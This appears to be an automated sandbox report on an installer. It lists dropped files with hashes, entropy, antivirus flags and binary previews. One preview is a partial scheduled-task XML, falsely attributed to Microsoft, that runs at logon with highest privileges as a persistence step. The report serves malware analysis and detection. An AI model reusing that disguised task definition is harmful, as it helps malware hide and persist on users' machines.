                                        Preview:.@S....c...l ...............3...Q...R]..u&.(..c...o.A..q?oIS.j..O[..o..&....L)......Rm.jC,./....-=...Z.;..7..tH..f...n#.7.P#..#o..D..y....m........zH.!...M.|......Vs.^.Rb.X`....y.T.Sg....T.....E.?/.H.;h.)P.#.pz.LOG$..."L(.....?.D*.6g.J!.>.....f.....J..B..q...;w]9.v...V...$....L/m.H#..]...G....QQ..'.z.!NW~..R..y....E.)....m.k%....+....>....02../..M....b.l..f7..f?-~_..E.5.~....*.'....8?.n........x...#....9.........q.q.n...\....D.Uv9.9...P.j7P~q9[BV...>C..[F..k-UL(jfT..\..{d.v;.5.e.fb.3^+...Z|]S3G...$..H=.W..c...B...).v.D!...s...+.K...~=..l.2...X.m.-....m0.....p...>...d......e.J..gUr*4....vw.........T.cQ......\...]...Z{..q..n..'Ql.$..V.U9..j 4...9<..6i.....5.F.).k.LQ4.H...2..p.*.bQJ..4.K'C...#.%"q.u../zoXL...L...........'..g11=E.....y.8...~.Oe..X....u.M8.T.....Qq.m.........i....F.4e.([Hm.*...E....2........s. *R..{."4.x.]...-.....xQ@.z.......Bz.).[..C...T..".....q............M.X..CQ..A..........d...`S.3...e.X.....u.>.!..;k...>..
                                        Process:C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                                        File Type:7-zip archive data, version 0.4
                                        Category:dropped
                                        Size (bytes):56546
                                        Entropy (8bit):7.996966859255979
                                        Encrypted:true
                                        SSDEEP:1536:cWsX30GkPK2rw7bphKKdxDBxjqtalDFMflaX4:cZXhkPhr+TRJqtaK
                                        MD5:4CB8B7E557C80FC7B014133AB834A042
                                        SHA1:C42E2C861FF3ED0E6A11824E12F67A344E8F783D
                                        SHA-256:3EC6A665E7861DC29A393D00EAA00989112E85C6F1B9643CA6C39578AD772084
                                        SHA-512:A88E78258F7DB4AECD02F164E6A3AFCF39788E30202CF596F9858092027DDB2FDB66D751013A7ABA5201BFAFF9F2D552D345AFE21C8E1D1425ABBC606028C2E6
                                        Malicious:false
                                        Preview:7z..'....O; ........2.......D.X..Z.2..7nf..R..s# s..v.f.....%G..>..9..Jh.-j.r..q.2.=v..Q.....SW7....im..|.c...&...,.s....f.h...C.g~..f.7=9...,...sd....iD......cR.^...$..<....nd...S.O..E)0..SQ.AA.C..$.D.|. a.:..5.....b.....2......W.....Z.pS.b/.F.;|`...O/....@.......4.".b.(...4...,..h/.K$..r!...."..`.S...D?.":...n..f.{C..t..,/.S.0.N..M...v...(.Yn..-.)..-...N~....}..).. .j!...1H.7?R..X.....rKi....9.i[k..+.....Br\.=.k.t8...6Lmh.../.V^K.f.......*.@MM..`...,W.......E..v.H....0.W..~....I.....w....<....X.Azl.FH..6\.a..E?=..I.q.5...s...;.,J.0..J.../.w..,..n.EkN..,j....f.y&q.C}fnY..2\......0.....N!.J..H.H0.....BJ.Q..v}=......^c.'w..#...d.T1....#...2s}N.....2.%.?. ....l.).....a<5Y.s....}...2*.#s..]0h..._G....3].....7y.}.B.6...ywE....'q.....h..?p .#..Emm2..F..| .M.Rv!.v.G....1L.Kx...T...".a6.%S0..g..7.......J.vjO.{.A....B@.c.y>}.....N.+....:.L=[....._.....Y.{....F..|.w.oX..t&[.....a\.M..2.Qe.[}L.Ch[...G.S#.$9...8<..W.d1...*PH.`.....4.A.......?..g.
                                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):31890
                                        Entropy (8bit):7.99402458740637
                                        Encrypted:true
                                        SSDEEP:768:rzwmoD5r754TWCxhazPt9GNgRYpSj3PsQ4yVb595nQ/:vwmolXaT9abVzP1TC
                                        MD5:8622FC7228777F64A47BD6C61478ADD9
                                        SHA1:9A7C15F341835F83C96DA804DC1E21FDA696BB56
                                        SHA-256:4E5C193D58B43630E16B6E86C7E4382B26C9A812D6D28905DD39BC7155FEBEE1
                                        SHA-512:71F31079B6C3CE72BC7238560B2CBD012A0285B6A5AC162B18EAE61A059DD3B8DBCF465225E1FB099A1E23ED7BDDF0AAE4ED7C337A10DC20E0FEEC4BC73C5441
                                        Malicious:false
                                        Preview:.@S......................xi.\ .~.#..:}..fy?koGL^|kH.G...........x....Tg.Y.t....~^..".L.41.....R..|.....R...C.m(.M&...q.v.$..i..U.....).PY.......O.....~..p.u.Y.......{...5^q.|a.]..@DP".`Rz}...|N.uSW.......^..o...U..z...3...bH........p.......Y`..b.t.x.F^i.<.%.r.o..?w.Z..M.fI.!.a...Zsb.+.y..W...n.....;...........|.{.@Q.....#".M...4.A).#;..r...>E..]w{.-....B...........v..`...S...sY....h.Sa)...r.3.U;n8wXq.x...@^z...%8H.Zd._..f~.....u[..q$..%......C..../].rS.....".=..<o.<S....-^"..iIX..r...D.......k.P.e...U..n.]^p..pal....E.c..+..Gc..U?s.R...p...:>..v..o2..B.Hn..q...F..3.o...%.......C......*.V..|..2.J..i.r....|;T.C6).......a..~"K....Y.....]3.{{..N...X>.1.....:?....,..T+=s...............so.;....&....Q.\K..b............k,..#l...Yb...VE.g.3v.$'.H3......w.....{f..e.....PS.tQ..*.8a....5w....\8%..c.;......q.j.t0/.8s..(9....... .S...0.o.o......f*..]....U..>N....Kc/..ka.I"O-O.!./..S".IN .....%G...........x%..ZL`Sq.;.}w.`..k.....F.........Tp..}..?t..
                                        Process:C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                                        File Type:7-zip archive data, version 0.4
                                        Category:dropped
                                        Size (bytes):31890
                                        Entropy (8bit):7.99402458740637
                                        Encrypted:true
                                        SSDEEP:768:jh43RfBLJT55mgLMoqX3gX/i69sXCuWegxJr8qF88M:qhj+I7qCKNSegPnFM
                                        MD5:CE6034AFC63BB42F4E0D6CD897DFBCB8
                                        SHA1:49E6E67EB36FE2CCAA42234A1DBB17AA2B1C7CC0
                                        SHA-256:7B7EB1D44ED88E7C19A19CEDAA25855F6800B87EC7E76873F3EA4D6A65DAA25F
                                        SHA-512:7801FA33C19D6504FF2D84453F4BB810FD579CB0C8772871F7CC53E90B835114D0221224A1743C0F5AAE76C658807CC9B4EC3BEC2CAD4AB8C3FD03203DAA7CF0
                                        Malicious:false
                                        Preview:7z..'....oYU@|......2.........Z....f..t.#.............tb.7E..Jo.........b.I=.Y..6(..=....^..>i.^E.."q.$&8....N...p+.p. .P.z6.b,.8kdD......'...G.R.n.&5..C..H.E..So!T^n{.a#d....z.SB........Nb.........LO+B ...iV..HH.Cc*.o@|.....Yvxb^.cW....._.........m.}.(V.i.H$....R....`.M.p......A?....._..nb..D.*RT<bUV.n].....LD.qU.....U9....]...h..y!...I....&C......g`...YahZ.q4.{.....2ZRG..f.. .M....:t .........8..Eg.....o.....h.]{..........p...M...lh.@.(R.]!B.:...b78$...b.......hc...C~....I..B<.x_OB|...<. .=NZ.....z........sjJ.....*{<..L.......^...9..^d..$d..}......#.dL'~.}....M...j.(5..@.tcVm.H..-.n...D..&....<..Z...@]./7?...[..qfW..!...v...==..d..M..om~).....C..9....c<..WUV.ed.h...]....OCt(X.H<<:.9..{5j....Nh.L.$..>..D..haP..~...............}r=!.E.ng..........9+...2.g.H3Lx.Bu....]jC...q.g.g.U.4..<........)....oo.T.c_.......X.,.@...nu......D.B(~.5....x5...............4S7B..p...Uk.0-m.VM.M@.V\.o...(......".k..w....Z.([.@.MQ.i9..."W..m...N.,.
                                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):74960
                                        Entropy (8bit):7.99759370165655
                                        Encrypted:true
                                        SSDEEP:1536:x2PlxAOr0Y07RqyjjkFThaVNwDsKsNFBrFYek36pX4MDVuPFOnfIId+:QAOrf07RHjkFThaVGMLF3hNDcPFOn5s
                                        MD5:950338D50B95A25F494EE74E97B7B7A9
                                        SHA1:F56A5D6C40BC47869A6AE3BC5217D50EA3FC1643
                                        SHA-256:87A341B968B325090EF90DFB6D130ED0A1550A1EBDE65B1002E401F1F640854A
                                        SHA-512:9A6CC00276564DDE23D4CABA133223D31D9DDD06D8C5B398F234D5CE03774ED7B9C7D875543E945A5B3DB2851EC21332FE429A56744A9CC2157436400793FF83
                                        Malicious:false
                                        Preview:.@S........................F.T....r...z'I.N..].u.e.e..y.....<|r.:v.....J.i...L.Sv.....Nz..,..K.sI*./.d.p.'.R.....6eF....W{."J.Nt'.{E....mU_..qc.G..M..y.QF)..N..W.o.D!.-...A$.....Nc.(...~.5.9'..>...E..>.5n..s..W.A7..../..+..E.....v..^&.....V..H6..j..S`H.qAG.R.i^&....>@SYz.@......q.....\t=.HE...i..".u.Z.(y.m..3.0\..Wq9#.....iH7..TL.U..3,b........L...D..,..t(mS..06...[6.y....0-....f.N7..R......./..z.bEQ.r..n.CmB'..@......(...l..=.s........`.6.?..[mzl....K.5"..#*.>.~..._...A.%b..........PnI.T...?R~JL<.$V..-.U..}\..t/F..<..t....y(K..v..6"..'.!.*z.R....EJ0.d<v:.R&......x...2....;Tc..(..dW...7a.)...rq.....{"h.wbB..t)f..qj........~.XR.a/........l./.S......".%?.C.cL._.,k.n'....a./.z...{.]...<......._pFP..d..,......Q...[........3...Kq).rJ..8..I.)o...i'Q..=......(dq(.m../..%=.......r m.X|3.......b.~tA.......%+.T..E@..ce...%....,..x#...,....-....A...q.....r.+...?......L..%.c.... ..>.Iw......P...O)...$`.'..D1.r.....*..9;..R...VL.]..%j.....TM.4.....P.L...
                                        Process:C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                                        File Type:7-zip archive data, version 0.4
                                        Category:dropped
                                        Size (bytes):74960
                                        Entropy (8bit):7.997593701656546
                                        Encrypted:true
                                        SSDEEP:1536:xsn0ayGU0SfvuEykcv5ZUi4Q9POZBgfmWRDOs2XwV1NN4+8wbr82nR+2R:xY0ntfvwkcv5ZwYPCBgfmW/VDS+FbrLN
                                        MD5:059BA7C31F3E227356CA5F29E4AA2508
                                        SHA1:FA3DC96A3336903ED5E6105A197A02E618E3F634
                                        SHA-256:1CBF36AFC14ECC78E133EBEC8A6EE1C93DEA85EEC472CE0FB0B57D3E093F08CC
                                        SHA-512:E2732D3E092B0A7507653A4743E1FE7A1010A20D4973C209BA7C0B2B79F02DF3CFDB4D7CE1CBFB62AA0C3D2CDE468FC2C78558DA4FF871660355E71DC77D8219
                                        Malicious:false
                                        Preview:7z..'....G8{p$......@..........0..$D.#'7..^..G.....W.K^.IC;.k...)_...S...2..x.....?(..Rj.g.......B...C..NK.B0s..L?.$..].....$r..E.]~...~K..E..3.......t..k..J......B...4.?!..6r.Qqc.5.r...\..,A.JF.J...Vb..b...M.=^.K7..e..]...X.%^3T...D.y..e2..>...k...\...S.C....')......hhV..K...z4..$d....a[.....6.&.D.:.=^.8.M[....n..i[....]..Y.4...NpkjU..;..W5.#.p.8?u....!.......u.[?.$..^.}f.A..G.N...b7.*...!!.(.....Gc..........Dg....Z.*.#.\".e.m.).t.5..r...6"....Q......fx..W......k..K7^."C.4*Z.{.^WG.....Z..P......Z....7R.....5hy...s....b.....7.V.....k.=.y.i.i......Y.......FY$.|T.5..V...E|...q.........].}bl...y.....;...q....-a..RP3..L~k....|..p_......."......rJz."..v......Z....l1.O.N...Di...O.:m.X...W.......x..}..>ktk.,.~...n-.m..`...G......$.....].lPx..<..9.m4.n...d....G...{'.a........u).R.+.....y.`.p...1@..!..b...J.W..Vt,......h...k....W.,..@Sd.<ZG......}&.R.]p(Y...o...r.4m:.J`.U..S5.iN...^!Y..hHP.B.58....JvB.K.k;...4........\.6=&erz..2..&...Z.C...h_.
                                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):29730
                                        Entropy (8bit):7.994290657653607
                                        Encrypted:true
                                        SSDEEP:768:e7fyvDZi63BuPi2zBBMqUp6fJzwyQb91SPlssLK4:AfKNiG/2vMx6fJzwVb2tss7
                                        MD5:2C3E0D1FB580A8F0855355CC7D8D4F7A
                                        SHA1:177E4A0B7C4BC8ACE0F46127398808E669222515
                                        SHA-256:9818FEBDE34D7E9900EB1C7A32983CA60C676BE941E2BC1ED9FBD5A187C6F544
                                        SHA-512:B9410FC8F5BE02130D50E7389F9A334DD2F2A47694E88FBB9FB4561BD3296F894369B279546EEBB376452DF795C39D87A67C6EE84C362F47FA19CF4C79E5574E
                                        Malicious:false
                                        Preview:.@S....*z.p,..................kcn..a.^.<..=......7`....6..!`...W.,2u...K.r.1.......1...g<wkw.....q..VfaR...n.h.0b[.h.V$..7.7'd.....T.....`.....)k.....}..........bW'.t..@*.%e5....#.6.g.R.......,W....._..G.d...1..e/...e7....E.....b....#Z,#...@.J.j?....q.ZR.c.b.V....Y-.......3..&E...a.2vg$..z...M9.[......_.1U....A...L.0+3U.[)8...D........5......[..-.u...ib...[..I-....#|j..d..D.S.'.....J.`.....b..y...Iu.D.....2.r}.4....<K.%....0X..X[5.sD...Xh.(G...Z;.."..o..%.......,.y..\..M6.+,.]c..t.:.|...p%.../1%.{>..r..B..yA.......}.`.#.X....Rl`.6\~k.P8..C....V\^..2.7...... h. .>....}..u)..4..w..............^N...@.v....d.P...........IA.. G?..YJ>._La..Y.@.8N.a...BK.....x.T....u.....\x.t...~.2p.M..+.R&w.......7c!v.@..RGf.F.>^+.b=........@l.T5.:........#}.%>.-.C.[XR.TG.\..'....MH..x..Y...cL........y.>....%...:.S.W^..k.EE.5O`.6<5-kh_...."95..:p....P.jk`....b.7.Z.8Y....H(j2y..`d.q;RyZ.5$..3.;......0,......+O.....L.,..u.s....S.1o.g...l"..e.....Cy<....I.+..B@......~.0...<.
                                        Process:C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                                        File Type:7-zip archive data, version 0.4
                                        Category:dropped
                                        Size (bytes):29730
                                        Entropy (8bit):7.994290657653608
                                        Encrypted:true
                                        SSDEEP:768:0AnbQm4/4qQyDC44LY4VfQ8aN/DObt1dSt3OUqZNKME:0ab6c4oY0aBDObjot+Uqu7
                                        MD5:A9C8A3E00692F79E1BA9693003F85D18
                                        SHA1:5ED62E15A8AC5D49FD29EF2A8DC05D24B2E0FC1F
                                        SHA-256:B88E3170EC6660651AF1606375F033F42D3680E4365863675D0E81866E086CC3
                                        SHA-512:8354B80622A9808606F1751A53F865C341FF2CE1581B489B50B1181DAA9B2C0A919F94137F47898A4529ECCCD96C43FCCD30BCDF6220FA4017235053AF0B477D
                                        Malicious:false
                                        Preview:7z..'....G..s......2......../.....h..f...H=...v.:..Q.I..OP.....p..qfX.M.J..).9;...sp......ns./..;w....3.<..m..M.L...k..L..h[-Dnt.*'5....M(w%...HVL..F&......a...R.........SF.2....m@X&X5.!....ER......]xm.....\.....=.q.I.}v.l#.B........:.e....b6.l.d..O......H.C..$.',.B..Q\..\.B.%...g...3?.....*.XuE.J.6`.../...W.../......b..HL?...E.V[...^.~.&..I,..xUH..2V..H..$..;.....c.6.o........g.}.u:.X....9...|Ynic.*.....ooK..>..M~yb..0W....^..J(S......Q?...#.i.1..#.._.9..2E.S7c.....{..'...j.A.p......dS]......i.!..YS...%.Q<..\.0.....FNw....e...2...$..$4..Pv.R...mv...-.b.T.)..r*..!..).n4.+.l[.N...4qN....w.B..[......<U.etA.A....SB..^y.......^0.f._.&..Z.zV.%.R.f_dz.,E..JJ..%.R.7.3m.:..;.`...AoHLHC..|..)f...C....$...E....H"x..F....wW...3"......Y.*Y.....5....,E...tn.KS...2......w\Z..1.".O.=+..A...2.....A.........k. c..../2..i!q..q...u.'.m.6.j.\.....x...S....$....*.&(.).^..f.d.g"j..#^....W.]{.C.?2Z.'X...5.._@..q.j..Xb...n{1..<.i...'r...7'.F.L\(.8
                                        Process:C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                                        File Type:7-zip archive data, version 0.4
                                        Category:dropped
                                        Size (bytes):249984
                                        Entropy (8bit):7.999190724188687
                                        Encrypted:true
                                        SSDEEP:6144:inOVnV9eG7iJt7TzrZm+vIuLDUlvIuZNpMOlfzTqZaqH:inOVnH2z7FVUlTF7s
                                        MD5:D347FD565397B611DCDA50560B3ECDEF
                                        SHA1:25225A99B860798E8A9241615D3C8FECB57FA2CD
                                        SHA-256:BC10732B9B1A5939245965B7595A9A829B81F9A47B4C6F13EA47CF1DCB4672A6
                                        SHA-512:5A6A6311581BB320722440E47BEE3DDD9E374184AD912D149C932BD81BF377215B3A8D198051A24B26FBA713FDBC998AA76C9A736B73613DB3E55E279D9A02E5
                                        Malicious:false
                                        Preview:7z..'......| .......@.......B.T.....1T....p.j._.jk...~..|y;....)..e..U...J."......)..d8..?..........TW.1=F...c....n........a.Z.+.u..q..USSa...r....<x..).O&.l...8$>.....;Y...5u.uV|..^m..+i.....Npk.owl.o..Q...-23A3r}....[.H..2A.d.3.T...Z. X...4.d.{}~...V....4.D.d6.~#.U..W....L.D..A`:RDv..`Z..1.i.cI..w.=..^.|...J.s(.&{....|......;.\..:LTh..Gf..%-..i\.*=yr.D.?........A.....d...).V.}1|.Da*"ly.....%b.....*BC.h.(c.....u..Q..N.P...i...-..@.F.C...%C....1?81..l...CP2.zE......W....g.6.W....~f..\F.*jG3..S.u...X....O..w..n..M...x......`.......;Jn-.?..)..q.w....p...92...@..\A.itH-..l..j.3P.v.s...[..........L^N.:...<.*..ye..pP1.kP.S!.r..j.k...,7.....d...@....h.b.S....v.?..YS....YE..-W.$J.T...w....8...R..i?.K;n.q....6.B....$.M..r.0.g.b..b.s}.4...(.eB4vC....C..k.kv*.1Pb......Uu@..{..J..Y.e{.g...4.7o....H..t...r..O..tT.8Mg.N.\...X3..~..A..yz-...Y.'...)../+.gk.(6~.......at L..:0..$FzHx$...d..Q\s..k...........$..Y...g-...-.h .z..a...J...8.KD.r..\.i
                                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                        File Type:PE32+ executable (native) x86-64, for MS Windows
                                        Category:dropped
                                        Size (bytes):63640
                                        Entropy (8bit):6.482810107683822
                                        Encrypted:false
                                        SSDEEP:768:4l2NchwQqrK3SBq3Xf2Zm+Oo1acHyKWkm9loSZVHT4yy5FPSFlWd/Ce34nqciC50:kgrFq3OVgUgla/4nqy5K2/zW
                                        MD5:B4EAACCE30F51EAF2A36CEA680B45A66
                                        SHA1:94493D7739C5EE7346DA31D9523404D62682B195
                                        SHA-256:15E84D040C2756B2D1B6C3F99D5A1079DC8854844D3C24D740FAFD8C668E5FB9
                                        SHA-512:16F46ABE2DD8C1A95705C397B0A5A0BC589383B60FE7C4F25503781D47160C0D68CBA0113BA918747115EF27A48AB7CA7F56CC55920F097313A2DA73343DF10B
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 9%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.[.7.5N7.5N7.5N7.4NX.5NA'NN4.5NA'HN5.5N.|XN4.5N.|HN6.5NA'XN6.5N.|DN0.5N.|IN6.5N.|MN6.5NRich7.5N........................PE..d....(gK..........".........."............................................... ..............................................................d...(........................(.......... ................................................................................text............................... ..h.rdata..............................@..H.data...............................@....pdata..............................@..HINIT................................ ....rsrc...............................@..B.reloc..0...........................@..B................................................................................................................................................................................................................
                                        Process:C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):4096
                                        Entropy (8bit):3.3482223822620667
                                        Encrypted:false
                                        SSDEEP:48:dXKLzDln/L6w0QldOVQOj933ODOiTdKbKsz72eW+5y4:dXazDlnewhldOVQOj6dKbKsz7
                                        MD5:1E1D0466AB0FE8F2802587D337A10567
                                        SHA1:362B3B6EFBE51EBD0702167061812CA567BB11BD
                                        SHA-256:8B761FF2FDDF15A5E1AB4758D2112550B9A857F3B77F6A8EDC5F33586AEA06EC
                                        SHA-512:4F37DAE32D421BB88B4C2B079461BE28F47343E84A1546519CC8107C2A842C16D14D736504457E4586BFB92E68B01D905BC3B45C4F68FA1FF6E87B41A9996809
                                        Malicious:false
                                        Preview:<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2005-10-11T13:21:17-08:00</Date>. <Author>Microsoft Corporation</Author>. <Version>1.0.0</Version>. <Description>Microsoft</Description>. <URI>\kafanbbs</URI>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user</UserId>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="System">. <UserId>user</UserId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwo
                                        Process:C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                                        File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                        Category:dropped
                                        Size (bytes):5649408
                                        Entropy (8bit):6.392614480390128
                                        Encrypted:false
                                        SSDEEP:98304:jgRfP5jnFTyGZEWxSIBHVGT+t1ufqchZ:kRZDFTyGaHIJoWofqc
                                        MD5:8C71B86BF407C05BAF11E8D296B9C8B8
                                        SHA1:6624AB8CA883C48F02C58250D4EEE9E90098F4E4
                                        SHA-256:BE2099C214F63A3CB4954B09A0BECD6E2E34660B886D4C898D260FEBFE9D70C2
                                        SHA-512:BB3FEE727E40F8213F0A7D9808048E341295A684ECBA6F4DF52F1B07B528D7206CA41926B2433F4B63451565AD2854570FEE976BC7051B629ACD24FCA6D0F507
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................&.ZF..0V..<.............@..............................V.....L.V...`... ...............................................V../...........0O..............`V.\a...........................vL.(.....................V..............................text....XF......ZF.................`..`.data....z...pF..|...^F.............@....rdata.. 9....F..:....F.............@..@.pdata.......0O.......O.............@..@.xdata........Q.......Q.............@..@.bss.....;....U..........................idata.../....V..0....U.............@....CRT....h....@V.......U.............@....tls.........PV.......U.............@....reloc..\a...`V..b....U.............@..B................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):64
                                        Entropy (8bit):1.1940658735648508
                                        Encrypted:false
                                        SSDEEP:3:NlllulxmH/lZ:NllUg
                                        MD5:D904BDD752B6F23D81E93ECA3BD8E0F3
                                        SHA1:026D8B0D0F79861746760B0431AD46BAD2A01676
                                        SHA-256:B393D3CEC8368794972E4ADD978B455A2F5BD37E3A116264DBED14DC8C67D6F2
                                        SHA-512:5B862B7F0BCCEF48E6A5A270C3F6271D7A5002465EAF347C6A266365F1B2CD3D88144C043D826D3456AA43484124D619BF16F9AEAB1F706463F553EE24CB5740
                                        Malicious:false
                                        Preview:@...e................................. ..............@..........
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):3366912
                                        Entropy (8bit):6.530548291878271
                                        Encrypted:false
                                        SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                                        MD5:9902FA6D39184B87AED7D94A037912D8
                                        SHA1:F5D8470ACF5DFF81C6D3364A8943B24E3DB48D95
                                        SHA-256:43D9F1FA3BDA81C618CC23FBB4E9D8551305AF0090A3D452C4070F938F6BCFAC
                                        SHA-512:BC97E2C379C464F821AF0E38630DB65165F4E91A1105A3C7DABCC5E61CC9EAAB1522AC82E749AA4FEFC5A9E21A295A0A59CFE99D6BC3980F9C89F00AF5B8CF75
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                                        Process:C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                        Category:dropped
                                        Size (bytes):6144
                                        Entropy (8bit):4.720366600008286
                                        Encrypted:false
                                        SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                        MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                        SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                        SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                        SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                        Malicious:false
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Users\user\AppData\Local\Temp\is-L2M7T.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):3598848
                                        Entropy (8bit):7.004949099807939
                                        Encrypted:false
